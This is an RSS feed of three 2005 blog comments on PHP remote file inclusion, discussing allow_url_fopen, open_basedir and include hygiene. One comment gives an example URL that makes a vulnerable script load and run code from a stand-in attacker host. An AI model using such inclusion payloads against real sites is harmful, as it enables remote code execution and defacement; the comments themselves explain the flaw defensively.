<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"><channel><title>Technosailor - Latest Comments in Lessons in Web Security: PHP and Remote File Execution</title><link>http://technosailor.disqus.com/</link><description></description><language>en</language><lastBuildDate>Wed, 07 Sep 2005 18:21:52 -0000</lastBuildDate><item><title>Re: Lessons in Web Security: PHP and Remote File Execution</title><link>http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/#comment-1028691</link><description>Here's a simple example of why allow_url_fopen is a problem in the real world.&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;And then they run it with something like "http://www.example.com/index.php?page=page5.html".&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... 
whatever.&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;Moral: allow_url_fopen should *always* be off unless you need it.&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;Rob</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Robert Mathews</dc:creator><pubDate>Wed, 07 Sep 2005 18:21:52 -0000</pubDate></item><item><title>Re: Lessons in Web Security: PHP and Remote File Execution</title><link>http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/#comment-1028690</link><description>Hey Matt,&lt;br /&gt;&lt;br&gt;Checking $_SERVER['DOCUMENT_ROOT'] will not work because that global variable will be set according to the page doing the including, not the remote file itself. And yes, FTP will be a topic. :)</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Aaron</dc:creator><pubDate>Thu, 03 Feb 2005 09:30:48 -0000</pubDate></item><item><title>Re: Lessons in Web Security: PHP and Remote File Execution</title><link>http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/#comment-1028689</link><description>Ah yes open_basedir(), figured you'd mention that. Nice idea to use file_exists to check a file before including it. I s'pose there's lots of stuff you could do, like checking the $_SERVER["DOCUMENT_ROOT"] or the HOSTNAME to check the file is coming from itself.&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;Are you gonna do anything on FTP security? Not being much of a security buff myself, but thinking about it, were someone able to gain FTP access (don't know but with register_globals on, could you pass a system command through a $_GET equiv, or guest accounts/public_ftp etc.)
then they could upload whatever they wanted and have away with your system.&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;And you might want to mention for the more n00b programmers out there to give all includes a .php extension (and not a .inc, for example ;) :p).&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;Matt</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Matt Thornton</dc:creator><pubDate>Thu, 03 Feb 2005 08:43:14 -0000</pubDate></item></channel></rss>